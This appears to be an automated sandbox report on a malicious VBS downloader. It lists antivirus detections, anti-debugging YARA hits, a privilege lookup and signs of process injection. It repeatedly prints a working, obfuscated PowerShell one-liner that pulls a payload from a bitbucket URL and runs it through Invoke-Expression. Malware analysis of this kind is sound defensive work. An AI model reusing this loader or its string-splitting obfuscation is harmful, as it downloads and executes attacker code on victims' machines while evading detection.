"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 16, 2021, 11:22 a.m.	show_type: 0 filepath_r: POWErSHELL parameters: $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')\|&('I'+'EX'); filepath: POWErSHELL	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 16, 2021, 11:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2484 CREDAT:145409

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

DrWeb	VBS.DownLoader.2242
MicroWorld-eScan	VBS:Electryon.375
FireEye	VBS:Electryon.375
Cyren	VBS/Agent.AEC
Symantec	ISB.Downloader!gen81
ESET-NOD32	VBS/Agent.PIO
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VBS:Electryon.375
Ad-Aware	VBS:Electryon.375
Emsisoft	VBS:Electryon.375 (B)
MAX	malware (ai score=84)
GData	VBS:Electryon.375
ALYac	VBS:Electryon.375
Ikarus	Trojan.VBS.Agent
Fortinet	VBS/Agent.VRE!tr.dldr

One or more non-whitelisted processes were created (2 events)

parent_process	iexplore.exe				martian_process	POWErSHELL $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')\|&('I'+'EX');
parent_process	iexplore.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')\|&('I'+'EX');

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2484 resumed a thread in remote process 2596
NtResumeThread Aug. 16, 2021, 11:22 a.m.	thread_handle: 0x0000000000000364 suspend_count: 1 process_identifier: 2596	1	0	0

LabelTEXT.txt.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All